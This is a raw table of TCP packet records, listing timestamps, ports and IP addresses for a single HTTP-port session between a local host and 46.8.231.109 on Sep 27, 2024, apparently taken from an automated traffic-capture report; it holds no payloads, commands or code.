Sep 27, 2024 00:15:05.907819033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907823086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907846928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907864094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907887936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907893896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907927036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.907941103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907970905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.907977104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908023119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908025980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908056974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908066988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908088923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908099890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908126116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908145905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908159018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908170938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908191919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908205032 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908226967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908236027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908258915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908272982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908291101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908301115 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908323050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908334970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908354998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908366919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908386946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908399105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908418894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908430099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908451080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908464909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908483982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908495903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908514023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908524990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908545971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908557892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908577919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908588886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908610106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908624887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908644915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908655882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908679008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908691883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908710957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908723116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908744097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908755064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908776045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908788919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908807993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908818960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908838987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908850908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908871889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908885002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908902884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908916950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908936024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908948898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908968925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.908982992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.908999920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909012079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909032106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909044981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909064054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909075975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909095049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909106016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909127951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909142017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909159899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909173012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909192085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909209967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909224987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909236908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909257889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.909270048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.909301996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.982676029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.982718945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.982752085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.982804060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.982887983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.982939005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983221054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983282089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983289003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983319044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983340025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983361006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983366966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983418941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983419895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983447075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.983470917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.983489990 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.984266996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.984298944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.984323025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.984332085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.984335899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.984376907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.993864059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.993913889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.993921995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.993947983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.993979931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.994012117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.994043112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.994091034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.994112968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.994112968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.994112968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.994112968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.994126081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.994147062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997632027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997664928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997685909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997698069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997704983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997737885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997760057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997792006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997813940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997824907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997833967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997858047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997862101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997890949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.997903109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.997924089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998256922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998287916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998310089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998331070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998337030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998368025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998385906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998399973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998418093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998437881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998446941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998478889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998497009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998511076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998522043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998558998 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998563051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998588085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998598099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998620987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998630047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998655081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998672009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998687029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998701096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998718977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998734951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998766899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998768091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998800039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998819113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998843908 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998847961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998881102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998894930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998912096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998920918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998946905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998949051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.998977900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.998991013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999011993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999022007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999043941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999075890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999094009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999094009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999120951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999125004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999156952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999171019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999187946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999195099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999227047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999234915 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999258995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999272108 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999291897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999300957 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999324083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999336004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999356985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999367952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999396086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999406099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999437094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999438047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999471903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999485016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999516964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999521971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999552965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999569893 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999584913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999597073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999629021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999634027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999679089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999682903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999716043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999732971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999748945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999749899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999780893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999799013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999811888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999825954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999845028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999866009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999877930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999891043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999910116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999922037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999944925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:05.999944925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999975920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:05.999994040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000008106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000022888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000040054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000052929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000072956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000082970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000103951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000114918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000144958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000160933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000175953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000178099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000210047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000220060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000243902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000252008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000276089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000284910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000308990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000322104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000340939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000355959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000386000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000395060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000442028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000446081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000478029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000489950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000511885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000520945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000545025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000557899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000576973 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000591040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000607967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000619888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000639915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000653982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000670910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000685930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000704050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000711918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000731945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000749111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000762939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000766993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000794888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000803947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000827074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000835896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000860929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000874043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000893116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000902891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000925064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000938892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000957012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.000966072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.000988960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001003981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001019001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001035929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001051903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001066923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001084089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001100063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001116037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001125097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001147985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001152992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001180887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001197100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001214027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001230955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001245975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001255989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001279116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001293898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001310110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001328945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001344919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001353025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001382113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001393080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001411915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001427889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001446962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.001461029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.001504898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.069823027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.069895029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.069927931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.069946051 CEST	49708	80	192.168.2.5	46.8.231.109
